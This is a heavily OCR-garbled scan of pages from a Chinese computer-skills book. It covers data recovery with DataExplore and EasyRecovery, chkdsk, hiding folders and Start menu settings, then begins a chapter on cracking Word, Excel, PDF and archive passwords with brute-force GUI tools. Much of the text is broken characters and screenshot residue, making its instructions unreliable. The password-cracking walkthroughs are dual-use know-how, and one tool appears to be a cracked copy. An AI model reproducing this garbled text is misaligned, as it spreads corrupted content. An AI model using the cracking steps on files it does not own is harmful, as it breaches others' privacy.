' EF 让 全 和 史 已 res 6 
| 


加 


[step 图 打开 “提示 ”对 话 框 ， 提 示 用 户 要 把 
Ey 千 万 不 
要 往 要 恢复 的 分 区 上 写 入 新 文件 ， 以 避免 
破坏 数据 。 


提示 x 


请 您 把 文件 导出 到 别 的 硬盘 或 者 分 区 上 . 
千 万 不 要 往 要 恢复 的 分 区 上 瑟 入 新 文件 得 免 破坏 数据 1 


step 回 在 左 侧 选择 “已 删除 的 文件 ”选项 ， 
即 可 在 右 侧 窗 格 中 显示 出 其 具体 数据 列 
表 ， 可 将 其 导出 到 别 的 分 区 或 硬盘 。 


step 国 单 击 “确定 ”按钮 ， 打开“ 浏览 文件 
夹 ” 对 话 框 ， 在 其 中 选择 要 恢复 文件 的 保 
存 位 置 。 
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EP 六 


请 进 择 一 目录 幸 保存 数据 , 该 目录 必须 在 别 的 相间 分 区 
不 访 将 数据 与 出 天 间 修 时 的 分 区 上 - 


单 击 “确定 ”按钮 ， 即 可 开始 恢复 丢 
pr 恢复 完毕 后 ， 打 开 保 存 恢复 文 
件 的 位 置 ， 即 可 在 其 中 看 到 已 经 将 删除 的 
文件 恢复 。 

一 | 问 出 : | zl 帮主 (H - D x 


EY = # 35 上 


了 ”个 本 ， 此 电 ..，; 本 地 三- vo 家 "本 地 三 盖 .. 记 
快速 访问 “ Way 和 
同 
l 昼 dataexplorezip 
全 OneDrive 性交 加 rar 
国 此 和 及 时 Fnalhazip 
国 和 机 怕 datarecovery5zip 
驻 fr8476zip 
局 图 片 性 HA_FinalRecovery226275_OFA.rat 
图 六 risf v23.1.78.51.exe 
时 人 履 0pG492371.x86zip 
小 音乐 访 DGsetup 12758.exe 
国 点 面 渴 De 
号 Windows10 (Cy) 可。 验 excelpr zip 
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在 右 侧 窗 格 中 选择 所 需 恢 复 的 分 区 。 
| 让 


ET 


ES 


heart 国生 


单 击 “ 确 定 ” 按 钮 ， 系 统 开始 扫描 丢 
en 在 完成 数据 的 扫描 和 查找 后 ， 
所 查找 到 的 文件 将 会 显示 在 文件 夹 视图 和 
列表 视图 中 ， 然 后 将 其 导出 即 可 。 


| -一 夯 
De 0, 6 


a 1 flr s 
了 de Besorrs zr Rs eT 


时 颖 条 127 个 
a 


ET | 


Ef 


51 个 项 目 ”选中 1 个 项 目 261 KB 


。 周 s 


2. 恢复 格式 化 后 的 文件 
step 国 在 “DataExplore 数 据 恢复 大 师 ” 主 
窗口 中 单 击 “ 数 据 ” 按 钮 ， 打 开 “ 选 择 数 
据 ” 窗 口 


i A Sa 


格式 化 的 亿 妥 


二 


hass 的 师 中 


| Orrs T2919) 
He HS B30) 


P| 
step 图 选择 左 侧 的 “格式 化 的 恢复 ”选项 ， 
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3. 恢复 因 分 区 丢失 的 文件 
在 “DataExplore 数 据 恢复 大 师 ” 主 窗 
口中 单 击 “ 数 据 ” 按钮 ， 打 开 “ 选 择 数据 ? 
窗口 。 


证 


haet 罗 全 入 


step 图 选择 左 侧 的 “丢失 分 区 的 恢复 ” 选 
项 ， 在 右 侧 窗 格 中 选择 所 需 恢 复 的 分 区 。 


[Ym |X ™ 


单 击 “ 确 定 ” 按 钮 ， 系 统 开 始 扫 描 丢 
py 在 完成 扫描 和 查找 后 ， 所 查找 
到 的 文件 将 会 显示 在 文件 夹 视图 和 列表 视 
图 中 ， 然 后 将 其 导出 即 可 。 


| 所 DataEwplore 风 弥生 大 条 V2.53 一 上 小区 全 时 过 和 限 公司 - 0O x 
| 立 件 全 各国 抽 。 功 脏 GD 坦 丰 的。 再 口 加 交加) 


| 国 写 由 展品 品 吕 总 名 入 训 


[es 国 如 果 看 不 到 ， 则 可 在 选中 所 要 恢复 数 
据 的 硬盘 HD0 或 HD1 后 ， 单 击 “快速 扫描 丢 
失 的 分 区 ”按钮 ， 即 可 打开 “快速 扫描 分 
区 ”对 话 框 。 单 击 “ 开 始 扫描 ”按钮 ， 即 


可 快速 扫描 出 原来 丢失 的 分 区 。 
| 快运 扫 迫 分 区 x 
驱动 咕 |]? 
开始 肩 区 |0 
ld) 
SR Cm 
表 谨 
E 件 系统 | 状 慰 号 “| 开始 害 史 ”| 大 小 | 关 态 


4. Ghost 的 恢复 
step 国 在 “DataExplore 数 据 恢复 大 师 ” 主 
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窗口 中 单 击 “ 数 据 ” 按 钮 ， 打 开 “ 选 择 数 


据 ” 窗 口 。 
me Hs 
阁 式 化 的 禾 豆 加 入 再 8 
| 验 语 本 
VV Xm 
选择 左 侧 的 “Ghost 的 恢复 ”选项 ， 
在 右 侧 窗 格 中 选择 所 需 恢 复 的 分 区 。 
aERRss 
区 式 化 的 收 达 法 
| i i 
| 
ee 
设置 又 件 交 型 
WV (IX mm | 
斧 提 示 : 如 果 是 分 区 对 硬盘 进行 Ghost 恢 


复 ， 则 选择 所 要 恢复 数据 的 硬盘 HD0 或 
HD1， 单 击 “快速 扫描 丢失 的 分 区 ” 按 
妞 ， 即 可 打开 “快速 扫描 分 区 ”对 话 框 。 
单 击 “ 开 始 扫描 ”按钮 ， 即 可 快速 扫描 出 
原 有 分 区 。 


[step 图 单 去 “确定 ”按钮 ， 打 开 “ 属 性 对 话 
框 ” 对 话 框 ， 在 其 中 进行 相应 设置 查找 更 


多 的 文件 内 容 。 

时 性 对 活 杠 x 
口 查找 更 多 的 文件 类 型 A 

Doc 文 件 口 搜索 D0C 文 件 

PPT 文 件 口 搜索 PPT 文 件 

XLS 文件 口 搜索 XLS 文件 

了 B 文 件 口 搜索 DB 文件 

DWG 文 件 口 搜索 DWc 文 件 

BP 文件 口 搜索 BMP 文件 

GIF 文件 口 搜索 GIF 文件 

JP6 文 件 口 搜索 JP6 文 件 
PSD 文 件 口 搜索 P50 文 件 四 

让 am 地 

[We][X ™* | 


step 园 单 去 “确定 ”按钮 ， 系 统 开始 扫描 丢 
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失 的 数据 ， 在 完成 扫描 和 查找 后 ， 所 查找 
到 的 文件 将 会 显示 在 文件 夹 视图 和 列表 视 
图 中 ， 然 后 将 其 导出 即 可 。 


1 Dolorplore 抽 相生 大 呈 V2 53 一 上 后 学风 有 限 全 一 - ox 
六 伯 友 而 本 名 功放 ID 站 丰 |。 表 口 女友 


[让 上 虹 电 号 黑 虽 名 号 坊 
轩 鼠 示 凤 除 前 立 件 - 天 
时 文件 去 | 
Em roo 
= -~ ee 


E73 


DD am 


i 
系 才 于 017-01-03 14; 32 27 基 台 kh 的 文件 系 培 , 垃 于 | [于 吕 本， Km 
卉 出 33 个 


le 


8.5 ”实战 演练 


实战 演练 1 一 一 恢复 丢失 的 磁盘 徐 


磁盘 空间 丢失 的 原因 有 多 种 ， 如 误 操 
we 作 、 程 序 非 正常 退出 、 非 正常 关机 、 病 毒 的 
感染 、 程 序 运行 中 的 错误 或 对 硬盘 分 区 不 当 
5 洛 等 情况 都 有 可 能 使 磁盘 空间 丢失 。 磁 盘 空 间 
丢失 的 根本 原因 是 存储 文件 的 簇 丢 失 了 。 那 
么 如 何 才 能 恢复 丢失 的 磁盘 簇 呢 ? 在 “命令 
提示 符 ” 窗 口中 用 户 可 以 使 用 chkdsk/f 命 令 
找 回 丢 失 的 簇 ， 具体 的 操作 步 又 如 下 。 
[Eee 国 单 直 “开始 ”按钮 ， 从 弹出 的 “ 开 
始 ” 面 板 中 选择 “所 有 程序 ”一 “ 附 
件 ” 一 “运行 ”菜单 项 ， 打 开 “ 运 行 ” 对 
话 框 ， 在 “打开 ”文本 框 中 输入 注册 表 命 


令 cmd。 


| 可 运行 x 


画 Windows 将 根据 你 所 按 入 的 和 名称， 为 你 打开 栓 应 的 程序 、 
文件 夫 、 文 入 或 Internet 资源 . 


打 f(Q} | 到 


浏览 (B)- 


[sep 图 单 去 “确定 ”按钮 ， 打 开 cmd.exe 运 
行 窗口 ， 在 其 中 输入 命令 chkdsk d:/f。 
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画 管理 员 : C\WWINDOWS\system32\cm... 一 口 x 


Mi crosoft Windows [版 本 10. 0. 17134. 319] 
(c) 2018 Ji crosoft Corporation。 保 留 所 有 权利 。 


C:\Users\Administrator>chkdsk d:/fo 


v 


step 图 按 Enter 键 ， 此 时 会 显示 输入 的 DD 盘 文 
件 系 统 类 型 ， 并 在 窗口 中 显示 chkdsk 状 态 报 
告 ， 同 时 ， 列 出 符合 不 同 条 件 的 文件 。 


而 管理 呈 ; C\WINDOWS\system32\cmd.exe.. 
阶段 1: 检查 基本 文件 系统 结构 . 


口 x 
已 处 理 256512 个 文件 记录 。 

文件 验证 完成 。 
已 处 理 6 个 大 型 文件 记录 。 


已 处 理 0 个 错误 的 文件 记录 。 


阶段 2: 检查 文件 名 链接 , . 


已 处 理 1524 个 重新 解析 记录 。 


实战 演练 2 一 一 格式 化 硬盘 后 的 数据 恢复 


以 前 当 格 式 化 硬盘 后 ， 就 不 能 再 恢复 
数据 了 ， 但 是 有 了 EasyRecovery 软 件 后 ， 这 
一 问题 就 得 到 了 解决 。 这 里 以 格式 化 本 地 
磁盘 D: 后 再 对 其 数据 进行 恢复 为 例 ， 讲 解 
格式 化 硬盘 后 的 数据 恢复 ， 具 体 的 操作 步 
又 如 下 。 


[seep 园 双 去 桌面 上 的 EasyRecovery 快 捷 图 
标 ， 打 开 EasyRecovery 主 窗口 。 


E 全 启动 


Ontrack NSS 
Ea 


Professional 


[step 贺 单 击 EasyRecovery 主 界面 上 的 “数据 
恢复 ”功能 项 ， 即 可 进入 软件 的 “数据 恢 
复 ” 子 系统 窗口 ， 在 其 中 显示 了 “高 级 恢 
复 ”“ 删 除 恢复 ”“ 格 式 化 恢复 ”“ 原 始 
恢复 ”等 项 目 。 


副 除 恢复 
区 ”shaft 人 


格式 化 咳 复 ws 原始 恢复 
有 AP 人 tt [ 不 计生 何 文件 系 
沁 中 全 文件 让 从 人 和 的 本 


紧急 引导 盘 


加 继续 恢复 园 
各 级 已 代 夺 前 数 时 全 
de 创建 展 角 引 且 熏 


单 击 “数据 恢复 ”功能 项 中 的 “格式 
化 恢复 ”按钮 ， 即 可 开始 扫描 系统 。 


正在 扫描 系统 


step 贺 在 扫描 结束 后 ， 将 会 弹出 “目的 地 警 
告 ”提示 框 ， 建 议 用 户 将 文件 复制 到 不 与 
恢复 来 源 相同 的 一 个 安全 位 置 。 


i 
ST 


厂 不 再 明示 该 消 息 


加 | 


单 击 “确定 ”按钮 ， 将 会 自动 弹出 

“格式 化 恢复 ”对 话 框 ， 提 示 用 户 选择 一 个 

要 恢复 格式 化 文件 的 分 区 ， 这 里 选择 D 盘 。 
图 国 


这 择 人 重新 司 式 化 的 分 区 . 挫 捍 以 前 的 文件 系统 , 并 单 二 “下 一 步 ” 开 话 生 拉 文件 。 疙 全 “ 取 将 - 袁 出 工具 


[EECOEIE EL 

CR “格式 化 外 夏 ” 工具 洁 克 放 您 从 分 区 中 局 下文 件 ， 这 些 分区 被 站 
| 地 格式 化 可 重大 疾 了 。 该 太 收复 本 名 路 有 的 又 生计 络 反 
| 移 ， 并 党 这 概 夫 以 和 文件 系 二 相关 的 结 相 > 


3 CO TS dT. oh) 
司 CD mrs Ci.05 9) 


“以 前 的 件 系 综 ” 告 多 诈 疙 为 分 区 计 择 以 前 的 立 件 奈 统 兴 型。 次 
A 于 信息。 


以前 的 文件 才 
ms 下 
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step 国 单 击 “下 一 步 ”按钮 ， 开 始 扫描 选 定 
的 磁盘 ， 并 显示 扫描 进度 ， 如 已 用 时 间 、 
剩余 时 间 、 找 到 目录 及 找到 文件 等 。 


下 在 当 挫 文件， 图 
= 正在 处 理 区 块 : 2404150 / 116976627 


在 扫描 完毕 后 ， 将 扫描 到 的 相关 文件 
及 资料 在 对 话 框 左 侧 以 树 状 目录 列 出 来 ， 
右 侧 则 显示 具体 格式 化 的 文件 信息 。 在 其 
中 选择 要 恢复 的 文档 或 文件 夹 ， 这 里 选择 
“图 片 .rar” 文 件 。 

Ep E35YRecovery- 


Profezsonal 


格式 公 1 


选中 您 轨 要 隐秘 的 文件 , 寺 择 “下 一 步 - 拱 颖 到 “目的 地 进 择 ” 屏 萌 选择 “后 有 ”返回 到 “ 力 区 亿 
择 ” 屏 商 ， 挝 择 “ 取 洲 ”退出 工具 ， 


己 回 已 号 9 站 动 放 “” [ 钙 Tx EE En 
HO etre Deleted i 国 器 akospp- ss915 Me 10/3/2016 6 
由 口 自 fpeorcesn 加 iror ”481 Ma 10115/206 6G 
HO fpEcrcteamN 品 训 本 vt 531 字 3 10/142016 6 
nO taccycus on DThumbsdb 3000KB 10/6/2016 Xx 
GDB SecrctEan 。 -加 faezaap 17aM8 oa x 


4 用 6 
可 13 文中, 基 389 66 


厂 全 过 汉中 0D。 过 尖 颖 站 贡 (9) | 


RGBITT 文 中 , 共 481 Me 


天 一 
[mem EE 一 


[Eee 图 单 南 “ 下 一 步 ”按钮 ， 可 在 弹出 的 对 
话 框 中 设置 恢复 数据 的 保存 路 径 。 
EE EasYRecoveny Py 

式 化 


半 开 一 个 将 复归 所 的 目的 地 ， 迁 择 “ 下 一 步 ”开始 复 抽 文件。 选择 “后 过 ”返回 “标记 文 牟 以 复 ” 屏 
总 光泽 - 模 洁 识 出 T 县 - 


文件 1 
总 共 大 481 只 
从 大 目的 地 过 而 
FREE FE | | 
— mx || 
所 上 
厂 生 成 于 
[ W 这 


J ee an 
[B56 国 单 去 “浏览 ”按钮 ， 打 开 “ 浏 览 文件 
夹 ”对话 框 ， 在 其 中 选择 恢复 数据 保存 的 
位 置 。 
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浏 星 文 件 夫 x 


文件 天。 | 本 各 (后 
陋 


Step 可 单 去 “确定 ”按钮 ， 返 回 到 设置 恢复 
数据 保存 的 路 径 。 


新 建文 件 夫 (M) 


恪 式 化 闹 复 


,将 押 抽 娄 据 的 目的 地， 进 择 “下 一 步 ”开始 呈 抽 文件 。 渤 择 “ 后 进 ” 和 到 “标记 文 村 恢 复 ” 屏 


品 FEV i 玫 
估计 空闲 宇 间 : .61 此 遍 上 对 

报 此 

厂 生 克 施 厂 扫 告 

I 


单 击 “ 下 一 步 ” 按 钮 ， 软 件 自动 将 文 
件 恢复 到 指定 的 位 置 。 


已 恢复 1 / 1 个 文件 
已 恢复 2.94 MB / 4.81MB 


[step 图 在 完成 文件 恢复 操作 后 ，EasyRecovery 
将 会 弹出 一 个 恢复 完成 的 提示 信息 窗口 ， 
在 其 中 显示 了 数据 恢复 的 详细 内 容 ， 和 包括 
源 分 区 、 文 件 大 小 、 已 存储 数据 的 位 置 等 
内 容 。 

[step 图 单 击 “ 完 成 ”按钮 ， 打 开 “ 保 存 恢 
复 ” 对 话 框 。 单 击 “ 否 ”按钮 ， 即 可 完成 
恢复 ， 如 果 还 有 其 他 的 文件 要 恢复 ， 则 可 
以 单 击 “ 是 ”按钮 。 
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8.6 小 试 身 手 
练习 1: 隐藏 /显示 磁盘 文件 或 文件 夹 


隐藏 磁盘 文件 或 文件 夹 可 以 增强 文件 的 
安全 性 ， 同 时 可 以 防止 误 操作 导致 的 文件 丢失 
现象 。 隐 藏 与 显示 磁盘 数据 的 操作 步骤 类 似 ， 
本 节 以 隐藏 和 显示 文件 夹 为 例 进行 介绍 。 


1. 隐藏 文件 夹 


隐藏 文件 夹 的 具体 操作 步骤 如 下 。 
选择 需要 隐藏 的 文件 夹 并 单 击 鼠 标 右 
键 ， 在 弹出 的 快捷 菜单 中 选择 “属性 ” 命 
令 ， 弹 出“ 图片 属性 ”对 话 框 。 


和 国 片 尾 性 x 
二 类 。 3 享 安全。 以 的 杨 市 所 定义 
有 Es 
关于 文件 关 
xds $44 MB TIn764 闻 四 
二 551 MB 全 787648 字 司 
< 3 0 人 4 二 


2017458123 125852 


Be: 国 愉 要 (公主 二 于 文件 二 的 六 后 (R) 


口 RE RO) 


CJ Tw | 


[Sep 图 选择 “常规 ”选项 卡 ， 然 后 名 选 “ 隐 
藏 ” 复 选 框 。 


有 Ea 

a a 

全 Mve 

ds 544 MB (5710754 5) 
S551 M9 (5787.549 FD) 
a: 35 RH, 0 人 文件 天 
SNR: 2017558128, 125852 


le: 国 只 过 (人 应 用 于 文 呈 天文 人 RU) 


El WD) 


Ce mm 
单 击 “确定” 按钮 ， 弹 出 “确认 属性 
更 改 ” 对 话 框 ， 再 次 单 击 “确定 ”按钮 ， 


这 样 选择 的 文件 夹 被 成 功 隐藏 。 


是 否 要 符 此 标 次 仅 应 用 于 此 文 作 天 ， 或 者 是 否 要 棕 亡 应 用 于 所 有 子 文件 突 和 文 
件 ? 


口 公斤 更 改 应 用 于 此 立 件 实 
图 析 更 改 应 用 于 此 文件 夫 。 子 文件 夫 和 文件 
mm 
2. 显示 文件 来 


文件 被 隐藏 后 ， 用 户 要 想 调 出 隐藏 文 

件 ， 需 要 显示 文件 所 在 的 文件 夹 ， 具 体 的 
操作 步骤 如 下 。 
Estee 加 按 Alt 键 ， 调 出 功能 区 ， 选择 “ 查 
看 ”选项 卡 ， 勾 选 “ 显 示 / 隐 藏 ”组 中 的 
“隐藏 的 项 目 ” 复 选 框 ， 即 可 看 到 隐藏 的 
文件 或 文件 夹 。 


ee na 刁 


二 
加 te 
EL 


1158 国 昌 
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[step 图 右 去 该 文件 夹 ， 从 弹出 的 快捷 菜单 
中 选择 “属性 ”命令 ， 弹 出 “属性 ”对 话 
框 ， 选 择 “ 常 规 ” 选 项 卡 ， 然 后 取消 名 选 
“隐藏 ” 复 选 框 ， 单 击 “ 确 定 ” 按 钮 ， 便 


可 成 功 显 示 隐 藏 的 文件 夹 。 
国 | 加 蝗 > | ?al 图 - OO x 
项 撞 二 包 © 
tf >》 个 风 < 方 要 二 Y_ 品 | 省 过 "培训 " 
名称 
志 快速 访问 
Da 
人 二 OneDrive 
[eT 
臣 网络 
< > 
1 个 项 目 。 选中 1 个 项 目 转 卓 


练习 2: 添加 常用 文件 夹 到 “开始 ”菜单 加 


在 Windows 10 操 作 系统 中 ， 用 户 可 以 
自 定义 “开始 ”菜单 显示 的 内 容 ， 可 以 把 
常用 文件 夹 ( 例 如， 文档 、 图 片 、 音 乐 、 
视频 、 下 载 等 ) 添加 到 “开始 ”菜单 上 。 
按 Windows+I 组 合 键 ， 打 开 “ 设 置 ” 
窗口 ， 并 单 击 “ 个 性 化 ”一 “开始 ”一 “ 选 
择 哪 些 文件 夹 显示 在 “开始 ”菜单 ”命令 。 


- D x 


开始 

OO 

偶尔 在 开始 这 间 让 呈 示 硅 汉 

GD 

使 用 全 愤 - 开 好 -说 训 

人 @_) 关 
tL 
ED 于 

人 


有 痉 问 ? 
en] 


[step 图 在 弹出 的 窗口 中 选择 要 添加 到 “ 开 
始 ” 菜 单 上 的 文件 夹 ， 这 里 以 “文件 资源 
管理 器 ”为 例 ， 将 “文件 资源 管理 器 ” 按 
钮 设置 为 “ 开 ”。 
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+ 洱 o x| 


A 选择 哪些 文件 夹 显示 在 开始 菜单 
正 


文件 演 源 管理 各 
ER 
设 天 
DF 
文档 

ED 于 
下 载 
OO 


step 园 关闭 “设置 ”窗口 ， 按 Windows 键 ， 


打开 “开始 ”菜单 ， 即 可 看 到 添加 的 “ 文 
件 资 源 管理 器 ”图 标 。 


第 9 音 文件 密码 数据 的 防护 策略 


文件 的 安全 问题 是 伴随 着 计算 机 的 诞生 而 诞生 的 ， 如 何 才能 做 到 文件 的 绝对 安全 ， 这 
是 安全 专家 一 直 致力 于 的 研究 方向 。 本 章 介绍 文件 密码 数据 的 防护 策略 ， 主 要 内 容 包括 破 
解 文件 密码 的 常用 方式 、 各 类 文件 密码 的 防护 策略 和 加 密 磁盘 数据 等 内 容 。 


9.1 破解 文件 密码 的 常用 方式 


随 着 计算 机 和 互联 网 的 普及 与 发 展 ， 
越 来 越 多 的 人 习惯 于 把 自己 的 隐私 数据 保 
存在 个 人 计算 机 中 并 为 文件 加 密 ， 但 有 时 
难免 忘记 密码 ， 而 黑客 要 想 知道 文件 解密 
后 的 信息 ， 也 会 利用 破解 密码 技术 对 其 进 
行 解密 。 


9.1.1 破解 Word 文 档 密码 


Word Password Recovery 软 件 可 以 用 
来 快速 破解 Word 文 档 密码 ， 包 括 “ 暴 力 破 
解 ”“ 字 典 破 解 ”“ 增 强 破解 ”3 种 方式 。 

使 用 Word Password Recovery 软 件 破 解 
Word 文 档 密码 的 具体 操作 步骤 如 下 。 
下 载 并 安装 Word Password Recovery 
软件 ， 打 开 “Word Password Recovery” 操 
作 界面 ， 可 以 设置 不 同 的 解密 方式 ， 从 而 
提高 解密 的 针对 性 ， 加 快 解密 速度 。 


国 Word password Recovery v1.0L - RaindhSLT) 


生生 ool 


剖 计 罕 码 : 


民力 破解 增 晶 引擎- 字典。 选项 (o) 
加 启用 暴力 正解 


六 = eg 


ord Passord Recovery YL 已 和 中] 


Craoked By: fly [2005 11 29] Raind[sIT] 


Bes 国 单 去 “浏览 ”按钮 ， 打 开 “ 打 开 ” 对 
话 框 ， 在 其 中 选择 需要 破解 的 文档 。 


国 打 开 过 
下 找 围 (1): [个 文 档 “| OB 
如 名 称 修改 日 期 了 
mi Wor Adoc 2018/1214 10:59 1 
点 可 
座 
图 
此 电脑 
跟 国人 
Bm: [rd 可 
文件 类 型 人 T): 。 | 号 Word 文件 人 fdoo) v 取消 


单 击 “打开 ”按钮 ， 返回 到 Word 
Password Recovery 操 作 界 面 ， 并 在 “暴力 破 
解 ” 选 项 卡 下 设置 密码 的 长 度 和 人 允许 的 字 
符 类 型 。 

国 Word Password Recovery v1.0L - Raindr{SLT] 


辕 辣 曾 本 四 四 轩 


MS 统计 
Vsers Wiaistrotor Woomart] [和 0] 。 全 要 时 : 
stor Wooment] [|] 本 
号 前 二 8| 草 字 奥 。 和 页 O) 
回 记 时 力 名 a a 
和 时间 : a 
0 No J 


Cracked By: Fly [2005 11 29] Raindy[sIT] 


Step 加 单 击 “开始 ”按钮 ， 即 可 开始 破解 加 
密 的 Word 文 档 。 
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Word pasonord Recovery vondyis 


step 图 单 去 “打开 ”按钮 ， 打 开 “ 打 开 文 


?了 四 六 
0 件 ” 对 话 框 ， 在 其 中 选择 需要 破解 的 Excel 
i 本 
| i 文件 。 
a EE] To pr rm 
2 < 
让 ee 


a 2 
晤 二 
由 吾 乐 
a 
Ged ly ns ee] ee pb 
国 4. HE) 
[sep 图 在 破解 完毕 后 ， 将 弹出 “密码 已 经 成 me 目 。 
七 »》 对 计 并 关 信 息 显示 1 FnzN mEIn -| | 习 
功 恢复 时 话 框 ， 并 将 相关 信息 显示 在 该 = 
对 话 框 中 。 EE 
a x 单 击 “ 打 开 ” 按 钮 ,返回 到 Excel Password 
总 计 密 码 62193780 
已 试 客 码 2704 
总 计时 间 ow 
恢复 速度 243573 密 码 / 秒 
密码 123 
文档 C:\ Word 文档 内 容 . doe 
确定 


如 9.1.2 ”破解 Excel 文 件 密码 


Excel Password Recovery 软 件 是 一 款 简 
单 、 好 用 的 Excel 文 件 密码 破解 软件 ， 可 以 
帮助 用 户 快速 找 回 遗 忘 丢失 的 Excel 密 码 ， 
再 也 不 用 担心 忘记 密码 的 问题 了 。 
使 用 Excel Password Recovery 软 件 破 解 « WW 和 
Excel 文 件 密码 的 具 休 操作 步骤 如 下 ，。 ea 
下 载 并 安装 Excel Password Recovery em 
程序 ， 打 开 Excel Password Recovery 操 作 界 
面 ， 在 “恢复 ”选项 卡 下 用 户 可 以 设置 攻 
击 加 密 文档 的 类 型 。 


阅 Eeel Recovery 5.0 


[Sep 图 在 破解 完毕 后 ， 将 弹出 “密码 已 经 成 
功 恢复 ”对 话 框 ， 并 将 相关 信息 显示 在 该 
对 话 框 中 。 
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x 
总 计 密 码 62193760 
已 试 密码 2704 
总 计时 间 叱 
恢复 加 度 243573 密 码 / 秒 
密码 123 
文档 


C:\、… \ 加 密 工作 每 xds 


确定 


9.1.3 ”破解 PDF 文件 密码 


APDFPR 的 全 称 为 Advanced PDF Pass- 
word Recovery， 该 软件 主要 用 于 破解 受 密 
码 保护 的 PDF 文 件 ， 能 够 瞬间 完成 解密 过 
程 ， 解 密 后 的 PDF 文 件 可 以 用 任何 PDF 查 看 
器 打开 ， 并 能 任意 对 其 进行 编辑 、 复 制 和 
打印 等 操作 。 
使 用 Advanced PDF Password Recovery 
软件 破解 PDF 文件 的 具体 操作 步骤 如 下 。 
启动 Advanced PDF Password Recovery 


软件 ， 在 打开 的 操作 界面 中 单 击 “ 打 开 ” 
按钮 国 。 


| APDFPR S04 Enterprise Edition 区 
全 | 
森 开 开始 ! EM 一 关于 潜 出 

加 密 的 OF 文件 取 击 实 借 
加 最 力 
画 图。 牙 殿 ” 字典。 王 阳 描 ”自动 保存 寺 页 而 只 
8 Ds 语言 ; 阐 千 中 文 ~ 
回 最 4 全 过度 杀 轩 新 间 隔 |500 。 变 钞 
回 启 用 记 隶 apdfpr4log 
加 在 挛 件 过 择 时 开 凤 区 击 
捧 间 直 吕 
ER bodng roa te or 安生 入 
当前 口令 + 平均 态 昌 + 
3 SE 
3 


aporpR versin 5.04 (0 2001-3010 Eonsoft Coli 


打开 “打开 ”对 话 框 ， 选 择 需要 破解 
的 PDF 文件 ， 单 击 “ 打 开 ” 按 钮 。 


= 
TF ORG) v « 


IN) | GE 生活 pdf 
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step 图 返回 到 软件 主 界面 ， 在 “攻击 类 
型 ”下 拉 列 表 中 选择 破解 方式 为 “暴力 ” 
选项 。 


| APOFPR 5.04 Emerprise Edion 


x 
ES 
当 bd 坟 S| 
1 ES 二 各 关于 退出 
ee 
[UesWannsvabrpoamered| 淘 es | 
葛 国 长度” 字 奥 守 名 搜索 自 引 
选 而 
优 务 级 选 页 
四 O 〇 高 语言 [简体 中 六 
回 最 小 化 到 托 和 进度 条 更 交 间 隔 | 0。 毫 和 
加 让 了 胸 记录 到 apdfra be 
回 在 文件 达 捍 时 开 色 履 击 
ts 
De 
-Loadrg arguage file for 交往 中 广 。 
当前 全 速度 ， 
泌 EE 
了 要 
ow 
NoFrR verson 5.04(0 2001 2010 EeonSoft cot, 


[ep 加 在 “范围 ”选项 卡 中 ， 勾 选 “ 所 有 
大 写 拉 丁 文 (A~Z) ”“ 所 有 小 写 拉 丁 文 
(a~z) ”“ 所 有 数字 (0 一 9) ”“ 所 有 特 
殊 符号 (! @…) ” 复 选 框 ， 主 要 设置 解密 
时 允许 参与 密码 组 合 的 字符 及 起 止 范围 。 


APOFPR 5.04 Enterprise Ediion 一 


文件 (有 ”恢复 [R) 帮助 IH) 

民 . 山 山 训 基本 加 上 
打开 天 如 ET 和 助 。 关于 刘 册 
jn 的 Pr 文人 


区 型 
[Eeereeeepeeneei 由 | 二 
3 地 页 本 


ET A 开始 于 : [ 

(Se 3 sqf: [| 
所 有 持 下 行 呈 (IB..) ; 
空格 扩 码 
所 有 可 打印 字符 


月 PEX 口 8 


APDEFR 5.04 buld 18 leurehed = 
2 -Loadng enouaoe fle for 水 中 廊 ，- 
过度 ; 
和 
ow 
poFFR verson 5.04(0 2001-2010 BeomSofi cod, 


[图 选择 “长 度 ”选项 卡 ， 设 置 解密 时 
码 的 长 度 范围。 


| APOFPR 5.04 Eierprise Ediion 
ZH mR 
六 
个 WR 


淄 . 山 届 
打开 天 给 ES 


蚁 


1 的 PDF 文件 E22] 


nervemmeanendl 9 大 = 


充 轩 卡 划 “ 字 奥 。 守 名 要 索 “ 白 动 保存 过 项 高 级 
口 S 长 民选 


-上 宇和 罕 


最 大 口令 长度 = | “入 


oo te or Ht 


所 十 府 : 
时间: 


0% 
er verson S04 001 D0 Bonofi Co LH. 
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step 较 选择 “自动 保存 ”选项 卡 ， 
过 程 中 自动 保存 的 时 间 间 隔 。 


BB APDFPR 5.04 Enterprise Edition = x 
| 


设置 破解 


全 .有 必 大. 包 入 本 全 目 
习 开 。 开始! Sit 于 
证 3 
[Eeveerampoanened| 词 国力 加 


区 攻 要 、 字 由 二 素 自作 洛 而 高 经 
自动 保存 


回 全 和 硕 9 备 站 涪 4 上 自 吉 保 让 文件 名: [aodf a 
和 示人 站 昌林 

rpetorent mgr Wavarce POF Poevoro Recevery 上 
关 放 而 吕 


2010-12 0 二 人 的 -AROFFR 304 build Blamed 
571228 二 二 32-Loadrglanovade 用 他 简 作 由 并 


辣 9 续 竺 


生生 放 各 


o% 
aporpR verson 5.0+ (0 2001-2010 Exonsofi ot 


单 击 “开始 ”按钮 诅 ， 即 可 开始 破 
解 ， 相 关 破 解 信息 将 在 “状态 窗口 ”区 域 


中 显示 。 
国 APDFPR 5,04 - 5% 一 x 
lt a 
人 局 
关于 
到 
< 
字 
pe] 
有 可 
20 城 -12-2 18;25;29 -外 理 程 磺 ; Acobat Standard (Standard) 123-R Seoulty v4 
四 oh 
已 上 把 
口 今 长度 = 3 总 计 F 830,564 已 处 晶 : 44,735 
EG 5% 
looove on S07 0 0D rR oi 


step 图 如 果 破 解 成 功 ， 则 弹出 相应 的 对 话 
提示 “口令 已 成 功 恢复 ! ”信息 ， 单 
“确定 ”按钮 ， 完 成 解密 操作 。 


[7 二 
haaneedPDF paeswerd peevery 统计 信息: 
ESE [e237 
En mo 
平 的 十 度 们 信和 sm 
这 个 文件 的 口 人 (民主 ) | | 
十 六 衬 抽 号 (大 re 
这 个 文件 的 骂 几 问 名 3 
IEEUEEIE :za 站 
同人 询 了 RW 宕 Ve 


5 ARCHPR 的 全 称 Advanced Archive Pass- 
word Recovery， 该 软件 主要 用 于 破解 压缩 

文件 ， 下 面 介 绍 使 用 ARCHPR 破 解压 缩 文 

件 密 码 的 具体 操作 步 又 。 

[step 图 下 载 并 安装 Advanced Archive Password 
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Recovery 工 具 ， 双 击 桌 面 上 的 快捷 图 标 ， 打 
开 其 主 窗 口 。 


A ARCHPR 4.54 professional Edition = 笑 
文 们 (恢复 (R) 帮助 (H) 

名. bi 入 各 世 回回 忻 
打开 i 基 和 二 升级。 部 助 关于 退出 
i 攻击 类 型 

盈 ) > 

